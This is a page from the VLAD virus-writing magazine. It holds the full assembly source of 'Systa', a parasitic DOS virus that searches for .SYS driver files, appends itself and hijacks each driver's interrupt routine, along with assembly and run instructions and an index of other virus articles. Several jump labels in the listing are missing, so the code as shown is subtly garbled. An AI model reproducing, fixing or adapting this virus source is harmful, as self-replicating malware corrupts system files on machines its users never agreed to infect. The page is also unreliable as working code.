Virus Labs & Distribution
VLAD AF - Systa

;       Systa Virus
;       Direct action parasitic SYS infector by Qark.
; This virus has less potential for spread than a .BAT infector !
; What can I say ?  This virus sux..
; Although, maybe this virus can be used to demonstrate SYS infection.
; To assemble: a86 systa.asm
;              ren systa.bin
; To infect just run the .com in the same directory as ansi.sys.

        org     0

        push    ax
        push    bx
        push    cx
        push    dx
        push    si
        push    di
        push    ds
        push    es

        push    cs
        pop     ds
        push    cs
        pop     es

        mov     si,-1
        org     $-2                     ;Delta offset
delta   dw      100h

        mov     ax,[si+sysreturn]       ;Setup return to host
        mov     word ptr [8],ax
        sub     ax,offset origsys+2
        sub     ax,si
        mov     word ptr [si+origsys],ax

        mov     ah,2fh                  ;Save DTA
        int     21h
        mov     word ptr [si+dta],bx
        mov     word ptr [si+dta+2],es

        mov     ah,1ah                  ;Set DTA
        lea     dx,[si+newdta]
        int     21h

        mov     ah,4eh                  ;Find first
        mov     cx,3
        lea     dx,[si+wild]
        int     21h
        jnc     okfind
        jmp     return_sys
        mov     ax,3d02h                ;Open
        lea     dx,[si+newdta+1eh]
        int     21h
        jnc     ok_open
        jmp     return_sys
        mov     bx,ax

        mov     ah,3fh                  ;Read header
        mov     cx,10
        lea     dx,[si+sysheader]
        int     21h

        mov     di,dx
        mov     ax,word ptr [di]
        inc     ax                      ;Sys files begin with FFFF
        jnz     closeffirst
        mov     ax,word ptr [di+8]      ;We infect the "interrupt" routine
        mov     word ptr [si+sysreturn],ax
        mov     ax,4202h                ;EOF
        xor     cx,cx
        int     21h

        push    ax                      ;Infection check
        sub     ax,400
        cmp     ax,word ptr [di+8]
        pop     ax
        jb      closeffirst
        mov     word ptr [di+8],ax      ;Point interrupt routine to virus.
        mov     word ptr [si+delta],ax

        mov     ah,40h                  ;Write virus
        mov     cx,vsize
        mov     dx,si
        int     21h

        mov     ax,4200h                ;Start
        xor     cx,cx
        int     21h

        mov     ah,40h                  ;Write modified header
        mov     cx,10
        lea     dx,[si+sysheader]
        int     21h

        mov     ah,3eh                  ;Close
        int     21h
        jmp     return_sys

        mov     ah,3eh                  ;Close
        int     21h
       mov      ah,4fh                  ;Find next
       jmp      findnext

        mov     dx,word ptr [si+dta]    ;Restore DTA
        mov     ds,word ptr [si+dta+2]
        mov     ah,1ah
        int     21h

        pop     es
        pop     ds
        pop     di
        pop     si
        pop     dx
        pop     cx
        pop     bx
        pop     ax
        db      0e9h
origsys dw      0
        int     20h

        db      "SySta by Qark/VLAD",0

sysreturn       dw      offset origsys+2+100h

dta     dw      0
        dw      0
wild    db      "*.sys",0

vsize   equ     $

sysheader       dd      0
sysattrib       dw      0
strategy        dw      0
interrupt       dw      0

newdta  db      128 dup (0)


ARTICLE.1_2       Aims and Policies
ARTICLE.1_3       Greets
ARTICLE.1_4       Members/Joining
ARTICLE.1_5       Dist/Contact Info
ARTICLE.1_6       Hidden Area Info
ARTICLE.1_7       Coding the Mag


Butterfly Disasm
ARTICLE.2_2       Grandma Disasm
ARTICLE.2_3       Winword.Nemesis
ARTICLE.2_4       Stupid Poly guide
ARTICLE.2_5       Immortal Riot
ARTICLE.2_6       40hex
ARTICLE.2_7       Poet virus


VLAD Viruses
ARTICLE.3_2       Systa
ARTICLE.3_3       Improbability
ARTICLE.3_4       Vampire-1
ARTICLE.3_5       Prepender
ARTICLE.3_6       Futility+
ARTICLE.3_7       K-Rad


ARTICLE.4_2       Televirus
ARTICLE.4_3       Batchbug
ARTICLE.4_4       242
ARTICLE.4_5       ASMVirus
ARTICLE.4_6       NFV
ARTICLE.4_7       April-1

About VLAD - Links - Contact Us - Main